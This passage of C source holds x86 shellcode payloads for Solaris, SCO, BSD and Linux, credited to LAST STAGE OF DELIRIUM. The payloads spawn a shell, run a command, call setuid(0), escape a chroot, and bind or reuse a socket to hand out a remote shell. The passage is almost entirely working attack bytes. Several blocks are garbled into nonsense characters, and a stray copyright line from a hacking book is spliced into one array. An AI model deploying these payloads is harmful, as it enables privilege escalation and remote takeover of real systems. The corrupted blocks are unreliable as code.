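    "\x8d\x40\x09"         /* leal    0x09(%eax),%eax        */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x8d\x40\x03"         /* leal    0x03(%eax),%eax        */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe8\xde\xff\xff\xff" /* call    <cmdshellcode+2>       */
    "/bin/ksh -c "
    /* command */
;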
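/* Solaris/x86: setuid(0) (syscall 0x17) via `call *%esi`. */
char setuidcode[]=         /* 7 bytes                        */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x17"             /* movb    $0x17,%al              */
    "\xff\xd6"             /* call    *%esi                  */
;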
char chrootcode./ /- C0 b>tes -/
KOx(DKKb...K /- *ushl P0x!e!e!e(! -/
KOxDMOxe#K /- mo?l Jes*,Jedi -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOxDDOxC#Ox0BK /- mo?b Jal,0xB(Jedi) -/
KOx"#K /- *ushl Jedi -/
KOxb0Ox"0K /- mo?b P0x"0,Jal -/
KOxffOxd(K /- call -Jesi -/
KOx"#K /- *ushl Jedi -/
KOxb0OxBdK /- mo?b P0xBd,Jal -/
KOxffOxd(K /- call -Jesi -/
KOxC#K /- incl Jedi -/
KOxBBOxcMK /- xorl Jecx,Jecx -/
KOxb,OxffK /- mo?b P0xff,Jcl -/
KOx"#K /- *ushl Jedi -/
KOxb0Ox0cK /- mo?b P0x0c,Jal -/
KOxffOxd(K /- call -Jesi -/
KOxe!OxfaK /- loo* QchrootcodeN!D$ -/
KOxC#K /- incl Jedi -/
KOx"#K /- *ushl Jedi -/
KOxb0OxBdK /- mo?b P0xBd,Jal -/
KOxffOxd(K /- call -Jesi -/
;
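/* Solaris/x86 find-socket: walks descriptors, queries each with the
 * TI_GETPEERNAME ioctl (0x36) and compares the peer port against the
 * 0x1234 placeholder, which asmcodes.c overwrites at FINDSCKPORTOFS (39).
 * The matching fd is then dup'ed onto 0,1,2 with fcntl F_DUP2FD (0x3e). */
char findsckcode[]=        /* 67 bytes                       */
    "\x56"                 /* pushl   %esi                   */
    "\x5f"                 /* popl    %edi                   */
    "\x83\xef\x7c"         /* subl    $0x7c,%edi             */
    "\x57"                 /* pushl   %edi                   */
    "\x8d\x4f\x10"         /* leal    0x10(%edi),%ecx        */
    "\xb0\x91"             /* movb    $0x91,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x91"                 /* xchgl   %ecx,%eax              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x95"                 /* xchgl   %eax,%ebp              */
    "\xb5\x54"             /* movb    $0x54,%ch              */
    "\x51"                 /* pushl   %ecx                   */
    "\x66\xb9\x01\x01"     /* movw    $0x0101,%cx            */
    "\x51"                 /* pushl   %ecx                   */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x36"             /* movb    $0x36,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x59"                 /* popl    %ecx                   */
    "\x33\xdb"             /* xorl    %ebx,%ebx              */
    "\x3b\xc3"             /* cmpl    %ebx,%eax              */
    "\x75\x0a"             /* jne     <findsckcode+47>       */
    "\x66\xbb\x12\x34"     /* movw    $0x1234,%bx            */
    "\x66\x39\x5d\x02"     /* cmpw    %bx,0x2(%ebp)          */
    "\x74\x02"             /* je      <findsckcode+49>       */
    "\xe2\xe6"             /* loop    <findsckcode+23>       */
    "\x6a\x09"             /* pushb   $0x09                  */
    "\x51"                 /* pushl   %ecx                   */
    "\x91"                 /* xchgl   %ecx,%eax              */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x49"                 /* decl    %ecx                   */
    "\x89\x4c\x24\x08"     /* movl    %ecx,0x8(%esp)         */
    "\x41"                 /* incl    %ecx                   */
    "\xb0\x3e"             /* movb    $0x3e,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe2\xf4"             /* loop    <findsckcode+55>       */
;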
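/* Solaris/x86 bind-socket: so_socket (0xe6), bind (0xe8) to the port held in
 * the pushed 0x341202ff word (asmcodes.c patches bytes BINDSCKPORTOFS=5,6),
 * listen (0xe9), accept (0xea), then F_DUP2FD the client onto 0,1,2. */
char bindsckcode[]=        /* 73 bytes                       */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x68\xff\x02\x12\x34" /* pushl   $0x341202ff            */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x40"                 /* incl    %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\x48"                 /* decl    %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x02"             /* movb    $0x02,%al              */
    "\x50"                 /* pushl   %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\xe6"             /* movb    $0xe6,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x8b\xd8"             /* movl    %eax,%ebx              */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x89\x47\x04"         /* movl    %eax,0x4(%edi)         */
    "\x6a\x10"             /* pushb   $0x10                  */
    "\x57"                 /* pushl   %edi                   */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\xe8"             /* movb    $0xe8,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x6a\x05"             /* pushb   $0x05                  */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\xe9"             /* movb    $0xe9,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\xea"             /* movb    $0xea,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x8b\xd8"             /* movl    %eax,%ebx              */
    "\x6a\x09"             /* pushb   $0x09                  */
    "\x53"                 /* pushl   %ebx                   */
    "\x91"                 /* xchgl   %ecx,%eax              */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x49"                 /* decl    %ecx                   */
    "\x89\x4c\x24\x08"     /* movl    %ecx,0x8(%esp)         */
    "\x41"                 /* incl    %ecx                   */
    "\xb0\x3e"             /* movb    $0x3e,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe2\xf4"             /* loop    <bindsckcode+61>       */
;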
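/* x86 stack-pointer retrieval: returns %esp in %eax. */
char jump[]=
    "\x8b\xc4"             /* movl    %esp,%eax              */
    "\xc3"                 /* ret                            */
;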
#define FINDSCKPORTOFS 39
#define BINDSCKPORTOFS 05
#endif
SCO (OpenServer, UnixWare)/x86 codes, file: x86-sco
/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland *://lsd-pl.net/ #*/
/*## asmcodes for openserver 5.0.4 unixware 7.0 x86 #*/
/*
syscall     %eax stack
----------- ---- ---------------------------------------------------------------
exec        0x00b ret,->path="/bin/ksh",->[->a0=path,0]
exec        0x00b ret,->path="/bin/ksh",->[->a0=path,->a1="-c",->a2=cmd,0]
setuid      0x017 ret,uid=0
mkdir       0x050 ret,->path="b..",mode (each value is valid)
chroot      0x03d ret,->path={"b..","."}
chdir       0x00c ret,->path=".."
ioctl       0x036 ret,sfd,TI_GETPEERNAME=0x5491,->[mlen=0x91,len=0x91,->sadr[]]
close       0x006 ret,fd={0,1,2}
dup         0x029 ret,sfd
*/
#if defined(X86) && ( defined(OPENSERVER) || defined(UNIXWARE) )
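/* SCO/x86: self-contained exec of "/bin/ksh" (byte-identical to the Solaris
 * variant); appears to write its own 0x9a/0x07 call gate via stosl. */
char _shellcode[]=         /* 33+8 bytes                     */
    "\xeb\x1a"             /* jmp     <shellcode+28>         */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\x14"         /* leal    0x14(%eax),%edi        */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x42\x08"         /* movb    %al,0x8(%edx)          */
    "\x83\xef\x3b"         /* subl    $0x3b,%edi             */
    "\xb0\x9a"             /* movb    $0x9a,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x47"                 /* incl    %edi                   */
    "\xb0\x07"             /* movb    $0x07,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xe8\xe1\xff\xff\xff" /* call    <shellcode+2>          */
    "/bin/ksh"
;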
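/* SCO/x86 syscall stub: builds the lcall $0x7,$0 gate and leaves its
 * address in %esi for the `call *%esi` used by the other blocks. */
char syscallcode[]=        /* 26 bytes                       */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xeb\x09"             /* jmp     <syscallcode+13>       */
    "\x5f"                 /* popl    %edi                   */
    "\x57"                 /* pushl   %edi                   */
    "\x47"                 /* incl    %edi                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x47"                 /* incl    %edi                   */
    "\xaa"                 /* stosb   %al,%es:(%edi)         */
    "\x5e"                 /* popl    %esi                   */
    "\xeb\x0d"             /* jmp     <syscallcode+26>       */
    "\xe8\xf2\xff\xff\xff" /* call    <syscallcode+4>        */
    "\x9a\xff\xff\xff\xff"
    "\x07\xff"
    "\xc3"                 /* ret                            */
;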
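/* SCO/x86: exec("/bin/ksh") through the gate in %esi (`call *%esi`). */
char shellcode[]=          /* 25+8 bytes                     */
    "\xeb\x12"             /* jmp     <shellcode+20>         */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\x14"         /* leal    0x14(%eax),%edi        */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x42\x08"         /* movb    %al,0x8(%edx)          */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe8\xe9\xff\xff\xff" /* call    <shellcode+2>          */
    "/bin/ksh"
;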
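/* SCO/x86: exec("/bin/ksh","-c",cmd) via `call *%esi`; the command is
 * appended after the trailing 12-byte "/bin/ksh -c ".  The leal
 * displacement byte 0xac is -0x54. */
char cmdshellcode[]=       /* 36+12+cmdlen bytes             */
    "\xeb\x1d"             /* jmp     <cmdshellcode+31>      */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\xac"         /* leal    -0x54(%eax),%edi       */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\x88\x50\x08"         /* movb    %dl,0x8(%eax)          */
    "\x88\x50\x0b"         /* movb    %dl,0xb(%eax)          */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x8d\x40\x09"         /* leal    0x09(%eax),%eax        */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x8d\x40\x03"         /* leal    0x03(%eax),%eax        */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe8\xde\xff\xff\xff" /* call    <cmdshellcode+2>       */
    "/bin/ksh -c "
    /* command */
;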
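/* SCO/x86: setuid(0) (syscall 0x17) via `call *%esi`. */
char setuidcode[]=         /* 7 bytes                        */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x17"             /* movb    $0x17,%al              */
    "\xff\xd6"             /* call    *%esi                  */
;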
char chrootcode./ /- C0 b>tes -/
KOx(DKKb...K /- *ushl P0x!e!e!e(! -/
KOxDMOxe#K /- mo?l Jes*,Jedi -/
KOxBBOxc0K /- xorl Jeax,Jeax -/
KOxDDOxC#Ox0BK /- mo?b Jal,0xB(Jedi) -/
KOx"#K /- *ushl Jedi -/
KOxb0Ox"0K /- mo?b P0x"0,Jal -/
KOxffOxd(K /- call -Jesi -/
KOx"#K /- *ushl Jedi -/
KOxb0OxBdK /- mo?b P0xBd,Jal -/
KOxffOxd(K /- call -Jesi -/
KOxC#K /- incl Jedi -/
KOxBBOxcMK /- xorl Jecx,Jecx -/
KOxb,OxffK /- mo?b P0xff,Jcl -/
KOx"#K /- *ushl Jedi -/
KOxb0Ox0cK /- mo?b P0x0c,Jal -/
KOxffOxd(K /- call -Jesi -/
KOxe!OxfaK /- loo* QchrootcodeN!D$ -/
KOxC#K /- incl Jedi -/
KOx"#K /- *ushl Jedi -/
KOxb0OxBdK /- mo?b P0xBd,Jal -/
KOxffOxd(K /- call -Jesi -/
;
#if defined(UNIXWARE)
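/* UnixWare/x86 find-socket: same TI_GETPEERNAME (0x36) scan as the Solaris
 * block, comparing against the 0x1234 placeholder at FINDSCKPORTOFS (39);
 * the matching fd is moved onto 0,1,2 with close (0x06) + dup (0x29). */
char findsckcode[]=        /* 67 bytes                       */
    "\x56"                 /* pushl   %esi                   */
    "\x5f"                 /* popl    %edi                   */
    "\x83\xef\x7c"         /* subl    $0x7c,%edi             */
    "\x57"                 /* pushl   %edi                   */
    "\x8d\x4f\x10"         /* leal    0x10(%edi),%ecx        */
    "\xb0\x91"             /* movb    $0x91,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x91"                 /* xchgl   %ecx,%eax              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x95"                 /* xchgl   %eax,%ebp              */
    "\xb5\x54"             /* movb    $0x54,%ch              */
    "\x51"                 /* pushl   %ecx                   */
    "\x66\xb9\x01\x01"     /* movw    $0x0101,%cx            */
    "\x51"                 /* pushl   %ecx                   */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x36"             /* movb    $0x36,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x59"                 /* popl    %ecx                   */
    "\x33\xdb"             /* xorl    %ebx,%ebx              */
    "\x3b\xc3"             /* cmpl    %ebx,%eax              */
    "\x75\x0a"             /* jne     <findsckcode+47>       */
    "\x66\xbb\x12\x34"     /* movw    $0x1234,%bx            */
    "\x66\x39\x5d\x02"     /* cmpw    %bx,0x2(%ebp)          */
    "\x74\x02"             /* je      <findsckcode+49>       */
    "\xe2\xe6"             /* loop    <findsckcode+23>       */
    "\x8b\xd9"             /* movl    %ecx,%ebx              */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x49"                 /* decl    %ecx                   */
    "\x51"                 /* pushl   %ecx                   */
    "\xb0\x06"             /* movb    $0x06,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\x29"             /* movb    $0x29,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x41"                 /* incl    %ecx                   */
    "\xe2\xf2"             /* loop    <findsckcode+53>       */
;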
#endif
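/* x86 stack-pointer retrieval: returns %esp in %eax. */
char jump[]=
    "\x8b\xc4"             /* movl    %esp,%eax              */
    "\xc3"                 /* ret                            */
;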
#define FINDSCKPORTOFS 39
#define BINDSCKPORTOFS 05
#define SCO
#endif
(Free,Net,Open)BSD/x86 codes, file: x86-bsd
/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland *://lsd-pl.net/ #*/
/*## asmcodes for freebsd 3.4 openbsd 2.8 netbsd 1.5 x86 #*/
/*
syscall     %eax stack
----------- ---- ---------------------------------------------------------------
execve      0x03b ret,->path="/bin//sh",->[->a0=0],0
execve      0x03b ret,->path="/bin//sh",->[->a0=path,->a1="-c",->a2=cmd,0],0
setuid      0x017 ret,uid=0
mkdir       0x088 ret,->path="b..",mode (each value is valid)
chroot      0x03d ret,->path={"b..","."}
chdir       0x00c ret,->path=".."
getpeername 0x01f ret,sfd,->sadr[],->[len=0x10]
socket      0x061 ret,AF_INET=2,SOCK_STREAM=1,prot=0
bind        0x068 ret,sfd,->sadr=[0xff,2,hi,lo,0,0,0,0],->[0x10]
listen      0x06a ret,sfd,backlog=5
accept      0x01e ret,sfd,0,0
dup2        0x05a ret,sfd,fd={0,1,2}
*/
#if defined(X86) && ( defined(OPENBSD) || defined(FREEBSD) || defined(NETBSD) )
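/* BSD/x86: execve("/bin//sh") (syscall 0x3b); the doubled slash keeps the
 * path at exactly 8 bytes so it can be pushed as two words without a NUL. */
char shellcode[]=          /* 23 bytes                       */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x54"                 /* pushl   %esp                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x3b"             /* movb    $0x3b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;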
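/* BSD/x86: execve("/bin//sh","-c",cmd) (syscall 0x3b); the command string
 * is appended directly after the final call instruction. */
char cmdshellcode[]=       /* 44+cmdlen bytes                */
    "\xeb\x25"             /* jmp     <cmdshellcode+39>      */
    "\x59"                 /* popl    %ecx                   */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x66\x68""-c"         /* pushw   $0x632d                */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x50"                 /* pushl   %eax                   */
    "\x51"                 /* pushl   %ecx                   */
    "\x57"                 /* pushl   %edi                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x50"                 /* pushl   %eax                   */
    "\x57"                 /* pushl   %edi                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x3b"             /* movb    $0x3b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
    "\xe8\xd6\xff\xff\xff" /* call    <cmdshellcode+2>       */
    /* command */
;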
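/* BSD/x86: setuid(0) (syscall 0x17); the extra pushl %eax is the dummy
 * return-address slot the BSD int $0x80 convention expects. */
char setuidcode[]=         /* 8 bytes                        */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x17"             /* movb    $0x17,%al              */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */
;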

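/* BSD/x86 chroot escape: mkdir("b..") (0x88), chroot("b..") (0x3d),
 * 255 x chdir("..") (0x0c), chroot(".") (0x3d). */
char chrootcode[]=         /* 44 bytes                       */
    "\x68""b..."           /* pushl   $0x2e2e2e62            */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x88\x47\x03"         /* movb    %al,0x3(%edi)          */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x88"             /* movb    $0x88,%al              */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x3d"             /* movb    $0x3d,%al              */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x47"                 /* incl    %edi                   */
    "\x33\xc9"             /* xorl    %ecx,%ecx              */
    "\xb1\xff"             /* movb    $0xff,%cl              */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x0c"             /* movb    $0x0c,%al              */
    "\xcd\x80"             /* int     $0x80                  */
    "\xe2\xfa"             /* loop    <chrootcode+31>        */
    "\x47"                 /* incl    %edi                   */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x3d"             /* movb    $0x3d,%al              */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */
;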
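/* BSD/x86 find-socket: getpeername (0x1f) on descriptors counting down from
 * 0xff, comparing the peer port with the 0x1234 placeholder at
 * FINDSCKPORTOFS (32); the match is dup2'ed (0x5a) onto 0,1,2. */
char findsckcode[]=        /* 59 bytes                       */
    "\x56"                 /* pushl   %esi                   */
    "\x5f"                 /* popl    %edi                   */
    "\x83\xef\x7c"         /* subl    $0x7c,%edi             */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x10"             /* movb    $0x10,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x57"                 /* pushl   %edi                   */
    "\x31\xc9"             /* xorl    %ecx,%ecx              */
    "\xb1\xff"             /* movb    $0xff,%cl              */
    "\x51"                 /* pushl   %ecx                   */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x1f"             /* movb    $0x1f,%al              */
    "\x51"                 /* pushl   %ecx                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x59"                 /* popl    %ecx                   */
    "\x59"                 /* popl    %ecx                   */
    "\x33\xdb"             /* xorl    %ebx,%ebx              */
    "\x3b\xc3"             /* cmpl    %ebx,%eax              */
    "\x75\x0a"             /* jne     <findsckcode+40>       */
    "\x66\xbb\x12\x34"     /* movw    $0x1234,%bx            */
    "\x66\x39\x5f\x02"     /* cmpw    %bx,0x2(%edi)          */
    "\x74\x02"             /* je      <findsckcode+42>       */
    "\xe2\xe4"             /* loop    <findsckcode+14>       */
    "\x51"                 /* pushl   %ecx                   */
    "\x50"                 /* pushl   %eax                   */
    "\x91"                 /* xchgl   %ecx,%eax              */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x49"                 /* decl    %ecx                   */
    "\x89\x4c\x24\x08"     /* movl    %ecx,0x8(%esp)         */
    "\x41"                 /* incl    %ecx                   */
    "\xb0\x5a"             /* movb    $0x5a,%al              */
    "\xcd\x80"             /* int     $0x80                  */
    "\xe2\xf4"             /* loop    <findsckcode+47>       */
;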
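/* BSD/x86 bind-socket: socket (0x61), bind (0x68) to the port inside the
 * pushed 0x341202ff word (patched at BINDSCKPORTOFS=5,6), listen (0x6a),
 * accept (0x1e), then dup2 (0x5a) the client onto 0,1,2. */
char bindsckcode[]=        /* 70 bytes                       */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x68\xff\x02\x12\x34" /* pushl   $0x341202ff            */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x50"                 /* pushl   %eax                   */
    "\x6a\x01"             /* pushb   $0x01                  */
    "\x6a\x02"             /* pushb   $0x02                  */
    "\xb0\x61"             /* movb    $0x61,%al              */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x8b\xd8"             /* movl    %eax,%ebx              */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x89\x47\x04"         /* movl    %eax,0x4(%edi)         */
    "\x6a\x10"             /* pushb   $0x10                  */
    "\x57"                 /* pushl   %edi                   */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\x68"             /* movb    $0x68,%al              */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x6a\x05"             /* pushb   $0x05                  */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\x6a"             /* movb    $0x6a,%al              */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\x1e"             /* movb    $0x1e,%al              */
    "\x50"                 /* pushl   %eax                   */
    "\xcd\x80"             /* int     $0x80                  */
    "\x50"                 /* pushl   %eax                   */
    "\x50"                 /* pushl   %eax                   */
    "\x91"                 /* xchgl   %ecx,%eax              */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x49"                 /* decl    %ecx                   */
    "\x89\x4c\x24\x08"     /* movl    %ecx,0x8(%esp)         */
    "\x41"                 /* incl    %ecx                   */
    "\xb0\x5a"             /* movb    $0x5a,%al              */
    "\xcd\x80"             /* int     $0x80                  */
    "\xe2\xf4"             /* loop    <bindsckcode+58>       */
;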
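/* x86 stack-pointer retrieval: returns %esp in %eax. */
char jump[]=
    "\x8b\xc4"             /* movl    %esp,%eax              */
    "\xc3"                 /* ret                            */
;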
#define FINDSCKPORTOFS 32
#define BINDSCKPORTOFS 05
#define BSD
#endif
Linux/x86 codes, file: x86-linux
/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland *://lsd-pl.net/ #*/
/*## asmcodes for linux (redhat 6.2) x86 #*/
/*
syscall     %eax %ebx,%ecx,%edx
----------- ---- ---------------------------------------------------------------
exec        0x00b ->path="/bin//sh",->[->a0=path,0]
exec        0x00b ->path="/bin//sh",->[->a0=path,->a1="-c",->a2=cmd,0]
setuid      0x017 uid=0
mkdir       0x027 ->path="b..",mode=0 (each value is valid)
chroot      0x03d ->path={"b..","."}
chdir       0x00c ->path=".."
socketcall  0x066 getpeername=7,->[sfd,->sadr[],->[len=0x10]]
socketcall  0x066 socket=1,->[AF_INET=2,SOCK_STREAM=2,prot=0]
socketcall  0x066 bind=2,->[sfd,->sadr=[0xff,2,hi,lo,0,0,0,0],len=0x10]
socketcall  0x066 listen=4,->[sfd,backlog=102]
socketcall  0x066 accept=5,->[sfd,0,0]
dup2        0x03f sfd,fd={2,1,0}
*/
#if defined(X86) && defined(LINUX)
char shellcode./ /- !C b>tes -/
KOxB,Oxc0K /- xorl Jeax,Jeax -/
KOx"0K /- *ushl Jeax -/
KOx(DKK//shK /- *ushl P0x(D#B!f!f -/
KOx(DKK/binK /- *ushl P0x(e(M(!!f -/
KOxDMOxeBK /- mo?l Jes*,Jebx -/
KOx"0K /- *ushl Jeax -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOx"BK /- *ushl Jebx -/
KOxDMOxe,K /- mo?l Jes*,Jecx -/
KOxMMK /- cdRl -/
KOxb0Ox0bK /- mo?b P0x0b,Jal -/
KOxcdOxD0K /- int P0xD0 -/
;
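/* Linux/x86: execve("/bin//sh",["/bin//sh","-c",cmd,0],0); the command is
 * appended after the final call.  The code part is 41 bytes (the call that
 * the leading jmp targets sits at offset 36). */
char cmdshellcode[]=       /* 41+cmdlen bytes                */
    "\xeb\x22"             /* jmp     <cmdshellcode+36>      */
    "\x59"                 /* popl    %ecx                   */
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x66\x68""-c"         /* pushw   $0x632d                */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x50"                 /* pushl   %eax                   */
    "\x51"                 /* pushl   %ecx                   */
    "\x57"                 /* pushl   %edi                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdql                           */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
    "\xe8\xd9\xff\xff\xff" /* call    <cmdshellcode+2>       */
    /* command */
;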
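/* Linux/x86: setuid(0) (syscall 0x17, uid in %ebx). */
char setuidcode[]=         /* 8 bytes                        */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x31\xdb"             /* xorl    %ebx,%ebx              */
    "\xb0\x17"             /* movb    $0x17,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;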
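/* Linux/x86 chroot escape: mkdir("b..") (0x27), chroot("b..") (0x3d),
 * 255 x chdir("..") (0x0c), chroot(".") (0x3d); %ebx is stepped along the
 * pushed "bb.." so the same word serves as "b..", ".." and ".". */
char chrootcode[]=         /* 37 bytes                       */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""bb.."           /* pushl   $0x2e2e6262            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x43"                 /* incl    %ebx                   */
    "\x33\xc9"             /* xorl    %ecx,%ecx              */
    "\xb0\x27"             /* movb    $0x27,%al              */
    "\xcd\x80"             /* int     $0x80                  */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x3d"             /* movb    $0x3d,%al              */
    "\xcd\x80"             /* int     $0x80                  */
    "\x43"                 /* incl    %ebx                   */
    "\xb1\xff"             /* movb    $0xff,%cl              */
    "\xb0\x0c"             /* movb    $0x0c,%al              */
    "\xcd\x80"             /* int     $0x80                  */
    "\xe2\xfa"             /* loop    <chrootcode+26>        */
    "\x43"                 /* incl    %ebx                   */
    "\xb0\x3d"             /* movb    $0x3d,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;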
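/* Linux/x86 find-socket: socketcall(getpeername) (0x66/7) on descriptors
 * counting down from 0xff, comparing the peer port with the 0x1234
 * placeholder at FINDSCKPORTOFS (46); the match is dup2'ed (0x3f) onto
 * 2,1,0.  The comparison register is %ax (66 b8 / 66 39 46 02). */
char findsckcode[]=        /* 72 bytes                       */
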